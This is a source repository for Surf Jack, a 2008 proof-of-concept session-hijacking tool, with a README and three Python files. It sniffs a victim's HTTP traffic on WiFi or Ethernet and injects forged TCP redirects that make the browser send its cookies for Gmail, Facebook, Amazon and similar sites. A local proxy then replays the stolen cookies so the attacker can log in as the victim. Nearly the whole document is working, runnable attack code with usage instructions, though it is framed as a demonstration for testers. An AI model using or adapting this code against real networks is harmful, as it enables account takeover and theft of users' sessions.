├── README ├── helper.py ├── proxy.py └── surfjack.py /README: -------------------------------------------------------------------------------- 1 | This is a demonstration tool for the Surf Jack attack. 2 | It is able to hijack the cookie for various sites 3 | (some of which make use of HTTPS) and allows the tester to login as the victim. 4 | 5 | By: Sandro Gauci 6 | 7 | Requirements: 8 | Scapy - http://www.secdev.org/projects/scapy/ 9 | Scapy's requirements 10 | Python 2.4+ 11 | 12 | Features: 13 | * Does Wireless injection when the nic is in monitor mode 14 | * Supports Ethernet 15 | * Support for WEP (when the nic is in monitor mode) 16 | 17 | Known issues: 18 | * Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail) 19 | * Cannot stop the tool via a simple Control^C. This is a problem with the proxy 20 | 21 | Installation: 22 | 1. Get scapy from http://hg.secdev.org/scapy/raw-file/tip/scapy.py 23 | For more on installation of scapy: 24 | http://www.secdev.org/projects/scapy/portability.html 25 | 2. Extract Surf Jack files into the same directory as scapy.py 26 | 27 | Running: 28 | $ ./surfjack.py --help 29 | Usage: just run surfjack.py. use --help to print out the help 30 | 31 | Options: 32 | --version show program's version number and exit 33 | -h, --help show this help message and exit 34 | -i INTERFACE specify an interface 35 | -v increase verbosity 36 | -q quiet mode 37 | -j INJIFACE interface to use to inject packets with 38 | -W WEPKEY WEP key 39 | -c CONFIG Specify a custom configuration file 40 | --dontignoreself Disable ignoring of own traffic 41 | 42 | $ ./surfjack.py -i wlan0 -v -------------------------------------------------------------------------------- /helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # copyright of sandro gauci 2008 3 | # hijack helper functions 4 | def parseHeader(buff,type='response'): 5 | import re 6 | SEP = '\r\n\r\n' 7 | HeadersSEP = '\r*\n(?![\t\x20])' 8 | import logging 9 | log = logging.getLogger('parseHeader') 10 | if SEP in buff: 11 | header,body = buff.split(SEP,1) 12 | else: 13 | header = buff 14 | body = '' 15 | headerlines = re.split(HeadersSEP, header) 16 | 17 | if len(headerlines) > 1: 18 | r = dict() 19 | if type == 'response': 20 | _t = headerlines[0].split(' ',2) 21 | if len(_t) == 3: 22 | httpversion,_code,description = _t 23 | else: 24 | log.warn('Could not parse the first header line: %s' % `_t`) 25 | return r 26 | try: 27 | r['code'] = int(_code) 28 | except ValueError: 29 | return r 30 | elif type == 'request': 31 | _t = headerlines[0].split(' ',2) 32 | if len(_t) == 3: 33 | method,uri,httpversion = _t 34 | r['method'] = method 35 | r['uri'] = uri 36 | r['httpversion'] = httpversion 37 | else: 38 | log.warn('Could not parse the first header line: %s' % `_t`) 39 | return r 40 | r['headers'] = dict() 41 | for headerline in headerlines[1:]: 42 | SEP = ':' 43 | if SEP in headerline: 44 | tmpname,tmpval = headerline.split(SEP,1) 45 | name = tmpname.lower().strip() 46 | val = map(lambda x: x.strip(),tmpval.split(',')) 47 | else: 48 | name,val = headerline.lower(),None 49 | r['headers'][name] = val 50 | r['body'] = body 51 | return r 52 | 53 | def getdsturl(tcpdata): 54 | import logging 55 | log = logging.getLogger('getdsturl') 56 | p = parseHeader(tcpdata,type='request') 57 | if p is None: 58 | log.warn('parseHeader returned None') 59 | return 60 | if p.has_key('uri') and p.has_key('headers'): 61 | if p['headers'].has_key('host'): 62 | r = 'http://%s%s' % (p['headers']['host'][0],p['uri']) 63 | return r 64 | else: 65 | log.warn('seems like no host header was set') 66 | else: 67 | log.warn('parseHeader did not give us a nice return %s' % p) 68 | 69 | def gethost(tcpdata): 70 | import logging 71 | log = logging.getLogger('getdsturl') 72 | p = parseHeader(tcpdata,type='request') 73 | if p is None: 74 | log.warn('parseHeader returned None') 75 | return 76 | if p.has_key('headers'): 77 | if p['headers'].has_key('host'): 78 | return p['headers']['host'] 79 | 80 | def getuseragent(tcpdata): 81 | import logging 82 | log = logging.getLogger('getuseragent') 83 | p = parseHeader(tcpdata,type='request') 84 | if p is None: 85 | log.warn('parseHeader returned None') 86 | return 87 | if p.has_key('headers'): 88 | if p['headers'].has_key('user-agent'): 89 | return p['headers']['user-agent'] 90 | 91 | def calcloglevel(options): 92 | logginglevel = 30 93 | if options.verbose is not None: 94 | if options.verbose >= 3: 95 | logginglevel = 10 96 | else: 97 | logginglevel = 30-(options.verbose*10) 98 | if options.quiet: 99 | logginglevel = 50 100 | return logginglevel 101 | 102 | def getcookie(tcpdata): 103 | p = parseHeader(tcpdata,type='request') 104 | if p is None: 105 | return 106 | if p.has_key('headers'): 107 | if p['headers'].has_key('cookie'): 108 | return p['headers']['cookie'] 109 | 110 | 111 | -------------------------------------------------------------------------------- /proxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __doc__ = """Modified by sandro gauci for surfjack 3 | 4 | Originally called: Tiny HTTP Proxy. 5 | 6 | This module implements GET, HEAD, POST, PUT and DELETE methods 7 | on BaseHTTPServer, and behaves as an HTTP proxy. The CONNECT 8 | method is also implemented experimentally, but has not been 9 | tested yet. 10 | 11 | Any help will be greatly appreciated. SUZUKI Hisao 12 | """ 13 | 14 | __version__ = "0.2.2" 15 | 16 | import BaseHTTPServer, select, socket, urlparse, SocketServer 17 | import cgi, urllib 18 | from threading import Thread 19 | import logging 20 | 21 | class Ate: 22 | def __init__(self): 23 | self.cookies = False 24 | 25 | 26 | class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler): 27 | log = logging.getLogger('ProxyHandler') 28 | __base = BaseHTTPServer.BaseHTTPRequestHandler 29 | __base_handle = __base.handle 30 | setcookiepkt = "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nLength: %s\r\n%s\r\n%s" 31 | server_version = "TinyHTTPProxy/" + __version__ 32 | rbufsize = 0 # self.rfile Be unbuffered 33 | def handle(self): 34 | (ip, port) = self.client_address 35 | if hasattr(self, 'allowed_clients') and ip not in self.allowed_clients: 36 | self.raw_requestline = self.rfile.readline() 37 | if self.parse_request(): self.send_error(403) 38 | else: 39 | self.__base_handle() 40 | 41 | def _connect_to(self, netloc, soc): 42 | i = netloc.find(':') 43 | if i >= 0: 44 | host_port = netloc[:i], int(netloc[i+1:]) 45 | else: 46 | host_port = netloc, 80 47 | self.log.debug( "\t" "connect to %s:%d" % host_port ) 48 | try: soc.connect(host_port) 49 | except socket.error, arg: 50 | try: msg = arg[1] 51 | except: msg = arg 52 | self.send_error(404, msg) 53 | return 0 54 | return 1 55 | 56 | def do_CONNECT(self): 57 | soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 58 | try: 59 | if self._connect_to(self.path, soc): 60 | self.log_request(200) 61 | self.wfile.write(self.protocol_version + 62 | " 200 Connection established\r\n") 63 | self.wfile.write("Proxy-agent: %s\r\n" % self.version_string()) 64 | self.wfile.write("\r\n") 65 | sslsock = socket.ssl(soc) 66 | self._read_write(sslsock, 300, ssl=True) 67 | finally: 68 | self.log.debug("\t bye") 69 | soc.close() 70 | self.connection.close() 71 | 72 | def do_GET(self): 73 | global cookiejar 74 | global victimheaders 75 | global ate 76 | (scm, netloc, path, params, query, fragment) = urlparse.urlparse( 77 | self.path, 'http') 78 | if scm != 'http' or fragment or not netloc: 79 | self.send_error(400, "bad url %s" % cgi.escape(self.path)) 80 | return 81 | soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 82 | try: 83 | (ip, port) = self.client_address 84 | cookiehosts = cookiejar.keys() 85 | if (netloc == 'setcookies' or not ate.cookies): 86 | self.log.debug('time to set some cookies') 87 | if len(cookiehosts) > 0: 88 | self.log.debug('no cookies to set') 89 | if netloc in cookiehosts: 90 | newcookie = cookiejar[netloc] 91 | headers=''.join(map(lambda x: 'Set-cookie: %s;\r\n' % x, newcookie.split(';'))) 92 | nextpos = cookiehosts.index(netloc)+1 93 | print 'setting cookie for %s' % netloc 94 | if nextpos >= len(cookiehosts): 95 | body = "

all cookies set

" 96 | ate.cookies = True 97 | #cookiejar.clear() 98 | body += ''.join(map(lambda x: "%s\r\n
" % (urllib.quote(x),cgi.escape(x)),cookiehosts)) 99 | body += "go to http://setcookies to set new cookies later on" 100 | else: 101 | nextdestination = cookiehosts[nextpos] 102 | body = '' % urllib.quote(nextdestination) 103 | else: 104 | headers = '' 105 | body = 'taking you somewhere' % urllib.quote(cookiehosts[0]) 106 | else: 107 | headers = '' 108 | body = '

no cookies to set

go to http://setcookies to set cookies later on' 109 | self.log.debug( self.setcookiepkt % (len(body),headers,body)) 110 | self.wfile.write(self.setcookiepkt % (len(body),headers,body)) 111 | else: 112 | if self._connect_to(netloc, soc): 113 | self.log_request() 114 | soc.send("%s %s %s\r\n" % ( 115 | self.command, 116 | urlparse.urlunparse(('', '', path, params, query, '')), 117 | self.request_version)) 118 | #for header in victimheaders.keys(): 119 | #self.headers[header] = victimheaders[header][0] 120 | self.headers['Connection'] = 'close' 121 | del self.headers['Proxy-Connection'] 122 | if netloc in cookiejar.keys(): 123 | self.headers['Cookie'] = cookiejar[netloc] 124 | for key_val in self.headers.items(): 125 | soc.send("%s: %s\r\n" % key_val) 126 | soc.send("\r\n") 127 | self._read_write(soc) 128 | finally: 129 | self.log.debug( "\t bye") 130 | soc.close() 131 | self.connection.close() 132 | 133 | def _read_write(self, soc, max_idling=20,ssl=False): 134 | if ssl: 135 | connection = socket.ssl(self.connection) 136 | else: 137 | connection = self.connection 138 | 139 | iw = [connection, soc] 140 | ow = [] 141 | count = 0 142 | while 1: 143 | count += 1 144 | (ins, _, exs) = select.select(iw, ow, iw, 3) 145 | if exs: break 146 | if ins: 147 | for i in ins: 148 | if i is soc: 149 | out = connection 150 | else: 151 | out = soc 152 | data = i.recv(8192) 153 | if data: 154 | out.send(data) 155 | count = 0 156 | else: 157 | self.log.debug( "\t idle %s" % count) 158 | if count == max_idling: break 159 | 160 | do_HEAD = do_GET 161 | do_POST = do_GET 162 | do_PUT = do_GET 163 | do_DELETE=do_GET 164 | 165 | class ThreadingHTTPServer (SocketServer.ThreadingMixIn, 166 | BaseHTTPServer.HTTPServer): pass 167 | 168 | 169 | def dummy_log(): 170 | return 171 | ## this looks just like Wifizoo's 172 | ## that's because it is. Originally I started modifying the original code 173 | ## then noticed that wifizoo used the same code, and that's great :) 174 | 175 | class DrukqsProxy(Thread): 176 | import logging 177 | log = logging.getLogger('DrukqsProxy') 178 | def __init__(self,): 179 | Thread.__init__(self) 180 | def run(self): 181 | global ate 182 | global cookiejar 183 | #global victimheaders 184 | HandlerClass = ProxyHandler 185 | ServerClass = ThreadingHTTPServer 186 | protocol = 'HTTP/1.0' 187 | port = 8080 188 | server_address = ('127.0.0.1', port) 189 | HandlerClass.protocol_version = protocol 190 | httpd = ServerClass(server_address, HandlerClass) 191 | httpd.log_message = dummy_log 192 | sa = httpd.socket.getsockname() 193 | ate = Ate() 194 | cookiejar = self.cookiejar 195 | #victimheaders = self.victimheaders 196 | self.log.info( "Drukqs HTTP Proxy on %s:%s" % sa) 197 | httpd.serve_forever() 198 | 199 | 200 | -------------------------------------------------------------------------------- /surfjack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # proof of concept by sandro gauci 3 | # enablesecurity 2008 4 | # 20080809 5 | # what it does: forces web browsers to go to specific sites. This has the effect 6 | # of forcing these browsers to reveal the cookie. The attack needs to be launched 7 | # from a network location that allows the attacker to view all traffic being sent 8 | # by the victim. Examples of such locations are WiFi and Ethernet+ARP poisoning 9 | # 10 | # features: 11 | # - handles Ethernet connections (Use ettercap etc to poison ARP tables) 12 | # - handles WiFi connections with WEP support 13 | # (needs the card to be in monitor mode + allow packet injection) 14 | # - handles hosts which do not have port 80 open 15 | try: 16 | from scapy.all import * 17 | except ImportError: 18 | from scapy import * 19 | from helper import * 20 | from proxy import DrukqsProxy 21 | import logging 22 | import sys 23 | 24 | __GPL__ = """ 25 | 26 | SIPvicious SIP scanner searches for SIP devices on a given network 27 | Copyright (C) 2008 Sandro Gauci 28 | 29 | This program is free software: you can redistribute it and/or modify 30 | it under the terms of the GNU General Public License as published by 31 | the Free Software Foundation, either version 3 of the License, or 32 | (at your option) any later version. 33 | 34 | This program is distributed in the hope that it will be useful, 35 | but WITHOUT ANY WARRANTY; without even the implied warranty of 36 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 37 | GNU General Public License for more details. 38 | 39 | You should have received a copy of the GNU General Public License 40 | along with this program. If not, see . 41 | """ 42 | if sys.hexversion < 0x020400f0: 43 | sys.stderr.write("Please update to python 2.4 or greater to run Sipvicious\r\n") 44 | sys.exit(1) 45 | 46 | redirmsg = ["HTTP/1.1 302 Found", 47 | "Location: %(url)s", 48 | "Cache-Control: private", 49 | "Content-Type: text/html; charset=UTF-8", 50 | "Server: o_o", 51 | "Content-Length: 0", 52 | '', 53 | ''] 54 | 55 | redirpkt = '\r\n'.join(redirmsg) 56 | redirpkt += '\r\n'*100 57 | hijacked = dict() 58 | 59 | __version__='0.2' 60 | __author__="Sandro Gauci " 61 | class tcpsessions: 62 | """ Sets up TCP Sessions and able to reconstruct fragmented tcp packets """ 63 | import logging 64 | def __init__(self): 65 | global victimheaders 66 | self.log = logging.getLogger('tcpsessions') 67 | self.log.debug('initialized tcpsessions()') 68 | self.packets = dict() 69 | self.victimheaders = victimheaders 70 | 71 | def addpacket(self,packet): 72 | """adds the packet to the list""" 73 | if packet.haslayer(Raw): 74 | self.log.debug('we have a packet with payload') 75 | ipsrc = packet.getlayer(IP).src 76 | ipdst = packet.getlayer(IP).dst 77 | seq = packet.getlayer(TCP).seq 78 | ack = packet.getlayer(TCP).ack 79 | k = ipsrc,ipdst,ack 80 | if self.packets.has_key(k): 81 | self.log.debug('adding to previous packet (fragmented) %s' % str(k)) 82 | self.packets[k] += packet.getlayer(Raw).load 83 | self.log.debug(self.packets[k]) 84 | else: 85 | self.log.debug('new packet, creating new session %s' % str(k)) 86 | self.packets[k] = packet.getlayer(Raw).load 87 | self.log.debug(self.packets[k]) 88 | 89 | def getcookies(self): 90 | """ searches through all sessions looking for cookies""" 91 | cookies = dict() 92 | for k in self.packets.keys(): 93 | self.log.debug(self.packets[k]) 94 | cookie = getcookie(self.packets[k]) 95 | if cookie is not None: 96 | h = gethost(self.packets[k])[0] 97 | cookies[h] = cookie[0] 98 | self.victimheaders.update( parseHeader(self.packets[k],'request')['headers'] ) 99 | return(cookies) 100 | 101 | 102 | 103 | 104 | def http_monitor_callback(pkt): 105 | """handle each packet that matches the filter. This is where all the 106 | logic is""" 107 | packetbasket = list() 108 | log = logging.getLogger('http_monitor_callback') 109 | if pkt.haslayer(TCP): 110 | if pkt.haslayer(Dot11): 111 | uid = pkt.getlayer(Dot11).addr2 112 | elif pkt.haslayer(Ether): 113 | uid = pkt.getlayer(Ether).src 114 | else: 115 | self.log.error('protocol neither ethernet nor wifi - need to add support') 116 | return 117 | if hijacked.has_key(uid): 118 | if hijacked[uid]['closed']: 119 | log.debug('uid:%s is closed - skipping' % uid) 120 | return 121 | 122 | if uid in ignoreethersrc: 123 | log.debug('this is an ignored ethernet src') 124 | return 125 | if pkt.haslayer(Dot11): 126 | log.debug('building an 802.11 packet for you') 127 | l2 = Dot11(addr1=pkt.getlayer(Dot11).addr2, 128 | addr2=pkt.getlayer(Dot11).addr1, 129 | addr3=pkt.getlayer(Dot11).addr3, 130 | FCfield="from-DS" 131 | ) / \ 132 | LLC() / \ 133 | SNAP() 134 | elif pkt.haslayer(Ether): 135 | log.debug('building an Ethernet packet for you') 136 | l2 = Ether(dst=pkt.getlayer(Ether).src,src=pkt.getlayer(Ether).dst) 137 | else: 138 | self.log.critical('protocol neither ethernet nor wifi - need to add support - please let me know about this') 139 | return 140 | l3 = IP(src=pkt.getlayer(IP).dst, dst=pkt.getlayer(IP).src) 141 | l4 = TCP(dport=pkt.getlayer(TCP).sport,sport=pkt.getlayer(TCP).dport) 142 | log.debug('ethernet src: %s' % (uid)) 143 | 144 | if pkt.getlayer(IP).dst in hijackwholeconnection: 145 | if pkt.getlayer(TCP).flags == 2: 146 | log.debug("syn packet - time to hijack this connection") 147 | # SYN .. handle it 148 | pktreply = l2 / l3 / l4 149 | pktreply.getlayer(TCP).ack=pkt.getlayer(TCP).seq+1 150 | pktreply.getlayer(TCP).flags='SA' 151 | packetbasket = [pktreply] 152 | 153 | if pkt.getlayer(TCP).flags == 24 or pkt.getlayer(TCP).flags == 16: 154 | # psh ack 155 | if pkt.haslayer(Raw): 156 | log.debug('got some data') 157 | tcpdata = pkt.getlayer(Raw).load 158 | tcpsess.addpacket(pkt) 159 | nextdestination = None 160 | if tcpdata.startswith("GET "): 161 | log.debug('tcpdata starts with GET') 162 | dsturl = getdsturl(tcpdata) 163 | log.info('destination url in packet: %s'% dsturl) 164 | if dsturl in hijackdomains: 165 | nextpos = hijackdomains.index(dsturl) + 1 166 | if nextpos >= len(hijackdomains): 167 | nextdestination = hijacked[uid]['originaldestination'] 168 | else: 169 | nextdestination = hijackdomains[nextpos] 170 | log.info('dsturl %s in hijackdomains; next destination: %s' % (dsturl,nextdestination)) 171 | 172 | if not hijacked.has_key(uid): 173 | log.info('first time that we see %s' % uid) 174 | hijacked[uid] = dict() 175 | hijacked[uid]['originaldestination'] = dsturl 176 | hijacked[uid]['closed'] = False 177 | elif dsturl == hijacked[uid]['originaldestination']: 178 | hijacked[uid]['closed'] = True 179 | log.info('closing up') 180 | cookiejar.update(tcpsess.getcookies()) 181 | log.info('cookiejar: %s' % str(cookiejar)) 182 | if nextdestination is None: 183 | nextdestination = hijackdomains[0] 184 | if nextdestination is not None: 185 | log.debug('nextdestination is %s' % nextdestination) 186 | credirpkt = redirpkt % {'url': nextdestination } 187 | pktreply = l2/ l3 / l4 188 | pktreply.getlayer(TCP).seq = pkt.getlayer(TCP).ack 189 | pktreply.getlayer(TCP).ack = pkt.getlayer(TCP).seq+len(tcpdata) 190 | pktreply.getlayer(TCP).flags = "PA" 191 | finpkt = pktreply.copy() 192 | pktreply.getlayer(TCP).add_payload(credirpkt) 193 | finpkt.getlayer(TCP).flags="FA" 194 | finpkt.getlayer(TCP).seq += len(credirpkt) 195 | packetbasket = [pktreply,finpkt] 196 | log.debug('src = %s ; dst = %s' % (pkt.getlayer(IP).dst,pkt.getlayer(IP).src)) 197 | log.info('sent redirect to %s' % nextdestination) 198 | else: 199 | log.debug('not a GET request') 200 | elif pkt.getlayer(TCP).flags == 17: 201 | # fin ack 202 | log.debug('handling fin packets') 203 | pktreply = l2 / l3 / l4 204 | pktreply.getlayer(TCP).ack=pkt.getlayer(TCP).seq+1 205 | pktreply.getlayer(TCP).seq=pkt.getlayer(TCP).ack 206 | pktreply.getlayer(TCP).flags='FA' 207 | packetbasket.append(pktreply) 208 | sendp(packetbasket,verbose=0, iface=injiface) 209 | 210 | def getconfig(fn): 211 | from ConfigParser import ConfigParser 212 | import logging 213 | log = logging.getLogger('getconfig') 214 | configparser = ConfigParser() 215 | for x in xrange(3): 216 | if len(configparser.read(fn)) > 0: 217 | break 218 | else: 219 | defaultconfig = list() 220 | defaultconfig.append('[surfjack]') 221 | defaultconfig.append('site1=http://mail.google.com/') 222 | defaultconfig.append('site2=http://myspace.com/') 223 | defaultconfig.append('site3=http://www.facebook.com/') 224 | defaultconfig.append('site4=http://www.amazon.com/') 225 | defaultconfig.append('site5=http://www.skype.com/') 226 | defaultconfig.append('site6=http://www.salesforce.com/') 227 | defaultconfig.append('') 228 | defaultconfig.append('[hijack]') 229 | defaultconfig.append('ip1=1.1.1.1') 230 | log.warn( "%s not found.. creating default" % fn ) 231 | _tmp = open(fn,'w') 232 | _tmp.write('\r\n'.join(defaultconfig)) 233 | _tmp.write('\r\n') 234 | _tmp.close() 235 | continue 236 | r = list() 237 | for _section in ['surfjack','hijack']: 238 | if not configparser.has_section(_section): 239 | log.critical('configuration does not have section %s' % _section) 240 | return 241 | s = list() 242 | for _option in configparser.options(_section): 243 | s.append(configparser.get(_section,_option)) 244 | r.append(s) 245 | return r 246 | 247 | if __name__ == "__main__": 248 | from optparse import OptionParser 249 | o = OptionParser(usage="just run %prog. use --help to print out the help",version="%prog v"+str(__version__)+__GPL__) 250 | o.add_option('-i',help='specify an interface', dest="interface") 251 | o.add_option('-v', help="increase verbosity", dest='verbose', action='count' ) 252 | o.add_option('-q', help="quiet mode", dest='quiet', default=False, 253 | action='store_true' ) 254 | o.add_option('-j', help="interface to use to inject packets with", 255 | dest="injiface") 256 | o.add_option('-W', help="WEP key", dest="wepkey") 257 | o.add_option('-c', help="Specify a custom configuration file", dest='config', 258 | default='surfjack.ini') 259 | o.add_option('--dontignoreself', help="Disable ignoring of own traffic", 260 | dest="ignoreself", default=True, action="store_false") 261 | options, args = o.parse_args() 262 | loglevel = calcloglevel(options) 263 | logging.basicConfig(level=loglevel) 264 | log = logging.getLogger() 265 | ignoreethersrc = list() 266 | _tmp = getconfig(options.config) 267 | if _tmp is None: 268 | sys.exit(1) 269 | hijackdomains,hijackwholeconnection = _tmp 270 | log.info('surfjacking the following sites: %s' % (' '.join(hijackdomains))) 271 | log.info('hijacking connections to the following ips: %s' % (' '.join(hijackwholeconnection))) 272 | if options.interface is not None: 273 | log.debug('setting interface to %s' % options.interface) 274 | conf.iface = options.interface 275 | injiface = conf.iface 276 | if options.injiface is not None: 277 | injiface = options.injiface 278 | log.info('monitor interface: %s' % conf.iface) 279 | log.info('inject interface: %s' % injiface) 280 | if options.wepkey is not None: 281 | conf.wepkey = options.wepkey 282 | if options.ignoreself: 283 | try: 284 | ignoreethersrc.append(get_if_hwaddr(conf.iface)) 285 | except: 286 | log.warn('could not add local address to the ignore list') 287 | cookiejar = dict() 288 | victimheaders = dict() 289 | proxy = DrukqsProxy() 290 | proxy.cookiejar = cookiejar 291 | proxy.victimheaders = victimheaders 292 | proxy.start() 293 | log.info('started proxy') 294 | tcpsess = tcpsessions() 295 | try: 296 | log.debug('sniffing') 297 | sniff(prn=http_monitor_callback, filter="tcp dst port 80", store=0) 298 | except socket.error: 299 | log.critical('could not run - probably a permissions problem') --------------------------------------------------------------------------------